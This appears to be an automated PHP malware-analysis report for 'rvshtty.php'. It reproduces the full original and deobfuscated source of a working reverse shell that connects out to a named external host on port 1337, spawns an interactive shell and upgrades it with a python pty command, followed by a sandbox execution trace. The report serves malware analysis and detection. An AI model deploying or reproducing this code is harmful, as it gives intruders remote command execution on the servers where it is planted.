rvshtty.php

md5: 6fa741894b8d56f4c2dfab39735cd721

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Execution
proc_open (Deobfuscated, Original)
shell_exec (Deobfuscated, Original)

Deobfuscated PHP code
<?php

// AUTHOR: trhacknon
// CHANGE THE FOLLOWING PARAMS AS NEEDED:
//---------------------------------------------------------------
$addr = 'vmi850151.contaboserver.net';
# shell destination (loopback for testing)
$port = 1337;
# shell destination port
$timeout = 20.0;
# connection timeout time (seconds):
$shell = 'uname -a; w; id; /bin/sh -i';
# shell to run
//---------------------------------------------------------------
// open a socket to connect to host
$socket = fsockopen($addr, $port, $errno, $errstr, $timeout);
// check if connection successful
if (!$socket) {
    exit("UNABLE TO CONNECT TO HOST\n");
}
// notify host
fwrite($socket, "[+] CONNECTION ESTABLISHED\n");
// set socket to non-blocking
stream_set_blocking($socket, FALSE);
// file descriptors
$descriptorspec = array(
    0 => array("pipe", "r"),
    #stdin
    1 => array("pipe", "w"),
    #stdout
    2 => array("pipe", "w"),
);
fwrite($socket, "[*] ATTEMPTING TO SPAWN SHELL\n");
// get a shell
$process = proc_open($shell, $descriptorspec, $pipes);
// make sure we have a shell
if (!is_resource($process)) {
    fwrite($socket, "[-] FAILED TO SPAWN A SHELL ON TARGET\n");
    exit("FAILED TO SPAWN SHELL\n");
}
// notify host
fwrite($socket, "[+] SHELL SPAWNED SUCCESSFULLY\n");
// set data streams to non-blocking so they
// don't wait for data when being read
stream_set_blocking($pipes[0], FALSE);
stream_set_blocking($pipes[1], FALSE);
stream_set_blocking($pipes[2], FALSE);
//attempt to stablize shell
fwrite($socket, "[*] ATTEMPTING TO STABILIZE SHELL\n");
if (cmdExists("python") && cmdExists("bash")) {
    fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/bash\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} elseif (cmdExists("python3") && cmdExists("bash")) {
    fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} elseif (cmdExists("python")) {
    fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/sh\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} elseif (cmdExists("python3")) {
    fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} else {
    fwrite($socket, "[-] UNABLE TO STABILIZE SHELL\n[-] TTY FUNCTIONALITY IS NOT AVAILABLE\n");
}
// now we've got a reverse shell.
// handle io:
while (TRUE) {
    // check our connection to the host:
    // we've lost our shell if we've
    // reached EOF on the socket or
    // or stdout pointers
    if (feof($socket) || feof($pipes[1])) {
        break;
    }
    // keeps track of the state of incoming
    // data from the host, stdout, and stderr
    $traffic = array($socket, $pipes[1], $pipes[2]);
    // dummy variables because we only care about traffic
    $write = null;
    $except = null;
    // wait for traffic
    $changedStreams = stream_select($traffic, $write, $except, null);
    // incoming commands from host:
    if (in_array($socket, $traffic)) {
        // get incomming command and send to stdin
        $command = fread($socket, 1500);
        fwrite($pipes[0], $command);
    }
    // outgoing messages from stdout
    if (in_array($pipes[1], $traffic)) {
        // get outgoing message and send to host
        $message = fread($pipes[1], 1500);
        fwrite($socket, $message);
    }
    // outgoing messages from stderr
    if (in_array($pipes[2], $traffic)) {
        // get outgoing message and send to host
        $message = fread($pipes[2], 1500);
        fwrite($socket, $message);
    }
}
// clean up nice
fclose($socket);
proc_close($process);
//check if a command is runnable on the system
function cmdExists($cmd)
{
    // attempt to execute, if returns false
    // we know we can't run that command
    if (!shell_exec("which {$cmd}")) {
        return false;
    }
    return true;
}
Execution traces
data/traces/6fa741894b8d56f4c2dfab39735cd721_trace-1676252849.0219.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:47:54.919798]
1	0	1	0.000208	393528
1	3	0	0.000376	414408	{main}	1		/var/www/html/uploads/rvshtty.php	0	0
1		A						/var/www/html/uploads/rvshtty.php	7	$addr = 'vmi850151.contaboserver.net'
1		A						/var/www/html/uploads/rvshtty.php	8	$port = 1337
1		A						/var/www/html/uploads/rvshtty.php	9	$timeout = 20
1		A						/var/www/html/uploads/rvshtty.php	10	$shell = 'uname -a; w; id; /bin/sh -i'
2	4	0	0.000445	414456	fsockopen	0		/var/www/html/uploads/rvshtty.php	15	5	'vmi850151.contaboserver.net'	1337	NULL	NULL	20
2	4	1	0.275933	415064
2	4	R			resource(3) of type (stream)
1		A						/var/www/html/uploads/rvshtty.php	15	$socket = resource(3) of type (stream)
2	5	0	0.275992	414896	fwrite	0		/var/www/html/uploads/rvshtty.php	25	2	resource(3) of type (stream)	'[+] CONNECTION ESTABLISHED\n'
2	5	1	0.276029	414960
2	5	R			27
2	6	0	0.276045	414896	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	29	2	resource(3) of type (stream)	FALSE
2	6	1	0.276063	414960
2	6	R			TRUE
1		A						/var/www/html/uploads/rvshtty.php	35	$descriptorspec = [0 => [0 => 'pipe', 1 => 'r'], 1 => [0 => 'pipe', 1 => 'w'], 2 => [0 => 'pipe', 1 => 'w']]
2	7	0	0.276147	414896	fwrite	0		/var/www/html/uploads/rvshtty.php	40	2	resource(3) of type (stream)	'[*] ATTEMPTING TO SPAWN SHELL\n'
2	7	1	0.276195	414960
2	7	R			30
2	8	0	0.276237	414920	proc_open	0		/var/www/html/uploads/rvshtty.php	43	3	'uname -a; w; id; /bin/sh -i'	[0 => [0 => 'pipe', 1 => 'r'], 1 => [0 => 'pipe', 1 => 'w'], 2 => [0 => 'pipe', 1 => 'w']]	NULL
2	8	1	0.277217	416848
2	8	R			resource(7) of type (process)
1		A						/var/www/html/uploads/rvshtty.php	43	$process = resource(7) of type (process)
2	9	0	0.277364	416744	fwrite	0		/var/www/html/uploads/rvshtty.php	54	2	resource(3) of type (stream)	'[+] SHELL SPAWNED SUCCESSFULLY\n'
2	9	1	0.277402	416808
2	9	R			31
2	10	0	0.277433	416744	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	59	2	resource(4) of type (stream)	FALSE
2	10	1	0.277450	416808
2	10	R			TRUE
2	11	0	0.277470	416744	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	60	2	resource(5) of type (stream)	FALSE
2	11	1	0.277495	416808
2	11	R			TRUE
2	12	0	0.277510	416744	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	61	2	resource(6) of type (stream)	FALSE
2	12	1	0.277526	416808
2	12	R			TRUE
2	13	0	0.277538	416744	fwrite	0		/var/www/html/uploads/rvshtty.php	65	2	resource(3) of type (stream)	'[*] ATTEMPTING TO STABILIZE SHELL\n'
2	13	1	0.277558	416808
2	13	R			34
2	14	0	0.277576	416744	cmdExists	1		/var/www/html/uploads/rvshtty.php	67	1	'python'
3	15	0	0.277595	416784	shell_exec	0		/var/www/html/uploads/rvshtty.php	155	1	'which python'
3	15	1	0.279025	417136
3	15	R			NULL
2	14	1	0.279048	417064
2	14	R			FALSE
2	16	0	0.279062	417064	cmdExists	1		/var/www/html/uploads/rvshtty.php	72	1	'python3'
3	17	0	0.279077	417104	shell_exec	0		/var/www/html/uploads/rvshtty.php	155	1	'which python3'
3	17	1	0.280416	417184
3	17	R			'/usr/bin/python3\n'
2	16	1	0.280457	417064
2	16	R			TRUE
2	18	0	0.280471	417064	cmdExists	1		/var/www/html/uploads/rvshtty.php	72	1	'bash'
3	19	0	0.280484	417104	shell_exec	0		/var/www/html/uploads/rvshtty.php	155	1	'which bash'
3	19	1	0.281748	417176
3	19	R			'/usr/bin/bash\n'
2	18	1	0.281785	417064
2	18	R			TRUE
2	20	0	0.281799	417064	fwrite	0		/var/www/html/uploads/rvshtty.php	74	2	resource(4) of type (stream)	'python3 -c \'import pty; pty.spawn("/bin/bash")\''
2	20	1	0.281818	417128
2	20	R			47
2	21	0	0.281831	417064	fwrite	0		/var/www/html/uploads/rvshtty.php	75	2	resource(3) of type (stream)	'[+] SHELL STABILIZED :: HIT \'ENTER\'\n'
2	21	1	0.281865	417128
2	21	R			36
2	22	0	0.281896	417064	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	22	1	0.281912	417096
2	22	R			FALSE
2	23	0	0.281925	417064	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	23	1	0.281945	417096
2	23	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	24	0	0.282009	417512	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	24	1	0.282041	417664
2	24	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	25	0	0.282079	417512	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[1 => resource(5) of type (stream)]
2	25	1	0.282096	417584
2	25	R			FALSE
2	26	0	0.282109	417512	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[1 => resource(5) of type (stream)]
2	26	1	0.282123	417584
2	26	R			TRUE
2	27	0	0.282135	417512	fread	0		/var/www/html/uploads/rvshtty.php	130	2	resource(5) of type (stream)	1500
2	27	1	0.282152	425928
2	27	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux\n'
1		A						/var/www/html/uploads/rvshtty.php	130	$message = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux\n'
2	28	0	0.282190	425864	fwrite	0		/var/www/html/uploads/rvshtty.php	131	2	resource(3) of type (stream)	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux\n'
2	28	1	0.282222	425928
2	28	R			107
2	29	0	0.282236	425864	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[1 => resource(5) of type (stream)]
2	29	1	0.282267	425936
2	29	R			FALSE
2	30	0	0.282281	425864	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	30	1	0.282300	425896
2	30	R			FALSE
2	31	0	0.282319	425864	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	31	1	0.282333	425896
2	31	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	32	0	0.282381	425864	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	32	1	0.285124	426016
2	32	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	33	0	0.285159	425864	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[1 => resource(5) of type (stream)]
2	33	1	0.285177	425936
2	33	R			FALSE
2	34	0	0.285190	425864	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[1 => resource(5) of type (stream)]
2	34	1	0.285205	425936
2	34	R			TRUE
2	35	0	0.285218	425864	fread	0		/var/www/html/uploads/rvshtty.php	130	2	resource(5) of type (stream)	1500
2	35	1	0.285253	426312
2	35	R			' 20:47:29 up 12:45,  2 users,  load average: 1.08, 1.11, 1.09\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nosboxes  tty2     tty2             05:52   11days  0.01s  0.01s /usr/libexec/gnome-session-binary --session=ubuntu\nosboxes  pts/6    -                12:44    7:15m  0.25s  0.09s sudo vim /etc/php/7.2/apache2/php.ini\n'
1		A						/var/www/html/uploads/rvshtty.php	130	$message = ' 20:47:29 up 12:45,  2 users,  load average: 1.08, 1.11, 1.09\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nosboxes  tty2     tty2             05:52   11days  0.01s  0.01s /usr/libexec/gnome-session-binary --session=ubuntu\nosboxes  pts/6    -                12:44    7:15m  0.25s  0.09s sudo vim /etc/php/7.2/apache2/php.ini\n'
2	36	0	0.285339	426088	fwrite	0		/var/www/html/uploads/rvshtty.php	131	2	resource(3) of type (stream)	' 20:47:29 up 12:45,  2 users,  load average: 1.08, 1.11, 1.09\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nosboxes  tty2     tty2             05:52   11days  0.01s  0.01s /usr/libexec/gnome-session-binary --session=ubuntu\nosboxes  pts/6    -                12:44    7:15m  0.25s  0.09s sudo vim /etc/php/7.2/apache2/php.ini\n'
2	36	1	0.285393	426152
2	36	R			347
2	37	0	0.285424	426088	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[1 => resource(5) of type (stream)]
2	37	1	0.285439	426160
2	37	R			FALSE
2	38	0	0.285452	426088	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	38	1	0.285471	426120
2	38	R			FALSE
2	39	0	0.285491	426088	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	39	1	0.285522	426120
2	39	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	40	0	0.285572	426088	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	40	1	0.286032	426240
2	40	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	41	0	0.286088	426088	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[1 => resource(5) of type (stream)]
2	41	1	0.286119	426160
2	41	R			FALSE
2	42	0	0.286148	426088	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[1 => resource(5) of type (stream)]
2	42	1	0.286164	426160
2	42	R			TRUE
2	43	0	0.286177	426088	fread	0		/var/www/html/uploads/rvshtty.php	130	2	resource(5) of type (stream)	1500
2	43	1	0.286206	426232
2	43	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
1		A						/var/www/html/uploads/rvshtty.php	130	$message = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
2	44	0	0.286254	425784	fwrite	0		/var/www/html/uploads/rvshtty.php	131	2	resource(3) of type (stream)	'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
2	44	1	0.286315	425848
2	44	R			54
2	45	0	0.286330	425784	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[1 => resource(5) of type (stream)]
2	45	1	0.286346	425856
2	45	R			FALSE
2	46	0	0.286358	425784	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	46	1	0.286372	425816
2	46	R			FALSE
2	47	0	0.286390	425784	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	47	1	0.286410	425816
2	47	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	48	0	0.286459	425784	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	48	1	0.286701	425936
2	48	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	49	0	0.286747	425784	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[2 => resource(6) of type (stream)]
2	49	1	0.286764	425856
2	49	R			FALSE
2	50	0	0.286777	425784	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[2 => resource(6) of type (stream)]
2	50	1	0.286792	425856
2	50	R			FALSE
2	51	0	0.286804	425784	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[2 => resource(6) of type (stream)]
2	51	1	0.286819	425856
2	51	R			TRUE
2	52	0	0.286831	425784	fread	0		/var/www/html/uploads/rvshtty.php	139	2	resource(6) of type (stream)	1500
2	52	1	0.286848	434120
2	52	R			'/bin/sh: 0: can\'t access tty; job control turned off\n$ '
1		A						/var/www/html/uploads/rvshtty.php	139	$message = '/bin/sh: 0: can\'t access tty; job control turned off\n$ '
2	53	0	0.286877	433976	fwrite	0		/var/www/html/uploads/rvshtty.php	140	2	resource(3) of type (stream)	'/bin/sh: 0: can\'t access tty; job control turned off\n$ '
2	53	1	0.286908	434040
2	53	R			55
2	54	0	0.286937	433976	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	54	1	0.286951	434008
2	54	R			FALSE
2	55	0	0.286966	433976	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	55	1	0.287000	434008
2	55	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	56	0	0.287081	433976	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	56	1	0.382607	434128
2	56	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	57	0	0.382678	433976	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[0 => resource(3) of type (stream)]
2	57	1	0.382698	434048
2	57	R			TRUE
2	58	0	0.382714	433976	fread	0		/var/www/html/uploads/rvshtty.php	121	2	resource(3) of type (stream)	1500
2	58	1	0.382737	442552
2	58	R			'HTTP/1.1 400 Bad Request\r\nDate: Mon, 13 Feb 2023 01:47:29 GMT\r\nServer: Python/3.10 websockets/10.2\r\nContent-Length: 77\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\nFailed to open a WebSocket connection: did not receive a valid HTTP request.\n'
1		A						/var/www/html/uploads/rvshtty.php	121	$command = 'HTTP/1.1 400 Bad Request\r\nDate: Mon, 13 Feb 2023 01:47:29 GMT\r\nServer: Python/3.10 websockets/10.2\r\nContent-Length: 77\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\nFailed to open a WebSocket connection: did not receive a valid HTTP request.\n'
2	59	0	0.382788	442488	fwrite	0		/var/www/html/uploads/rvshtty.php	122	2	resource(4) of type (stream)	'HTTP/1.1 400 Bad Request\r\nDate: Mon, 13 Feb 2023 01:47:29 GMT\r\nServer: Python/3.10 websockets/10.2\r\nContent-Length: 77\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\nFailed to open a WebSocket connection: did not receive a valid HTTP request.\n'
2	59	1	0.382819	442552
2	59	R			244
2	60	0	0.382833	442488	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[0 => resource(3) of type (stream)]
2	60	1	0.382850	442560
2	60	R			FALSE
2	61	0	0.382863	442488	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[0 => resource(3) of type (stream)]
2	61	1	0.382878	442560
2	61	R			FALSE
2	62	0	0.382891	442488	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	62	1	0.382907	442520
2	62	R			FALSE
2	63	0	0.382921	442488	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	63	1	0.382934	442520
2	63	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	64	0	0.382982	442488	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	64	1	0.383003	442640
2	64	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	65	0	0.383026	442488	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[0 => resource(3) of type (stream)]
2	65	1	0.383041	442560
2	65	R			TRUE
2	66	0	0.383054	442488	fread	0		/var/www/html/uploads/rvshtty.php	121	2	resource(3) of type (stream)	1500
2	66	1	0.383070	442584
2	66	R			''
1		A						/var/www/html/uploads/rvshtty.php	121	$command = ''
2	67	0	0.383093	442200	fwrite	0		/var/www/html/uploads/rvshtty.php	122	2	resource(4) of type (stream)	''
2	67	1	0.383107	442264
2	67	R			0
2	68	0	0.383119	442200	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[0 => resource(3) of type (stream)]
2	68	1	0.383134	442272
2	68	R			FALSE
2	69	0	0.383147	442200	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[0 => resource(3) of type (stream)]
2	69	1	0.383162	442272
2	69	R			FALSE
2	70	0	0.383174	442200	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	70	1	0.383187	442232
2	70	R			TRUE
2	71	0	0.383201	442200	fclose	0		/var/www/html/uploads/rvshtty.php	146	1	resource(3) of type (stream)
2	71	1	0.383215	433624
2	71	R			TRUE
2	72	0	0.383228	433592	proc_close	0		/var/www/html/uploads/rvshtty.php	147	1	resource(7) of type (process)
2	72	1	0.469655	415888
2	72	R			127
1	3	1	0.469701	415856
			0.469770	318528
TRACE END   [2023-02-12 23:47:55.389395]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php

    // AUTHOR: trhacknon

    // CHANGE THE FOLLOWING PARAMS AS NEEDED:
    //---------------------------------------------------------------
    $addr = 'vmi850151.contaboserver.net';   # shell destination (loopback for testing)
    $port = 1337;          # shell destination port
    $timeout = 20.0;       # connection timeout time (seconds):
    $shell = 'uname -a; w; id; /bin/sh -i'; # shell to run
    //---------------------------------------------------------------


    // open a socket to connect to host
    $socket = fsockopen($addr, $port, $errno, $errstr, $timeout);


    // check if connection successful
    if (!$socket) 
    {
        exit("UNABLE TO CONNECT TO HOST\n");
    }

    // notify host
    fwrite($socket, "[+] CONNECTION ESTABLISHED\n");


    // set socket to non-blocking
    stream_set_blocking($socket  , FALSE);


    // file descriptors
    $descriptorspec = array 
    (
        0 => array( "pipe", "r" ),  #stdin
        1 => array( "pipe", "w" ),  #stdout
        2 => array( "pipe", "w" )   #stderr
    );

    fwrite($socket, "[*] ATTEMPTING TO SPAWN SHELL\n");

    // get a shell
    $process = proc_open($shell, $descriptorspec, $pipes);


    // make sure we have a shell
    if ( !is_resource($process) )
    {
        fwrite($socket, "[-] FAILED TO SPAWN A SHELL ON TARGET\n");
        exit("FAILED TO SPAWN SHELL\n");
    }

    // notify host
    fwrite($socket, "[+] SHELL SPAWNED SUCCESSFULLY\n");


    // set data streams to non-blocking so they
    // don't wait for data when being read
    stream_set_blocking($pipes[0], FALSE);
    stream_set_blocking($pipes[1], FALSE);
    stream_set_blocking($pipes[2], FALSE);


    //attempt to stablize shell
    fwrite($socket, "[*] ATTEMPTING TO STABILIZE SHELL\n");

    if ( cmdExists("python") && cmdExists("bash") )
    {
        fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/bash\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    elseif ( cmdExists("python3") && cmdExists("bash") )
    {
        fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    elseif ( cmdExists("python") )
    {
        fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/sh\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    elseif ( cmdExists("python3") )
    {
        fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    else 
    {
        fwrite($socket, "[-] UNABLE TO STABILIZE SHELL\n[-] TTY FUNCTIONALITY IS NOT AVAILABLE\n");
    }



    // now we've got a reverse shell.
    // handle io:
    while (TRUE) 
    {

        // check our connection to the host:
        // we've lost our shell if we've 
        // reached EOF on the socket or
        // or stdout pointers
        if ( feof($socket) || feof($pipes[1]) ) 
        {
            break;
        }

        // keeps track of the state of incoming 
        // data from the host, stdout, and stderr
        $traffic = array($socket, $pipes[1], $pipes[2]);
        // dummy variables because we only care about traffic
        $write = null; $except = null;
        // wait for traffic
        $changedStreams = stream_select($traffic,$write,$except,null);


        // incoming commands from host:
        if ( in_array($socket, $traffic) )
        {
            // get incomming command and send to stdin
            $command = fread($socket, 1500);
            fwrite($pipes[0], $command);
        }


        // outgoing messages from stdout
        if ( in_array($pipes[1], $traffic) )
        {
            // get outgoing message and send to host
            $message = fread($pipes[1], 1500);
            fwrite ($socket, $message);
        }


        // outgoing messages from stderr
        if ( in_array($pipes[2], $traffic) )
        {
            // get outgoing message and send to host
            $message = fread($pipes[2], 1500);
            fwrite ($socket, $message);
        }

    }

    // clean up nice
    fclose($socket);
    proc_close($process);


    //check if a command is runnable on the system
    function cmdExists ($cmd)
    {
        // attempt to execute, if returns false 
        // we know we can't run that command
        if ( !shell_exec("which $cmd") )
        {
            return false;
        }

        return true;
    }

?>
PHP Malware Analysis

rvshtty.php

md5: 6fa741894b8d56f4c2dfab39735cd721

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
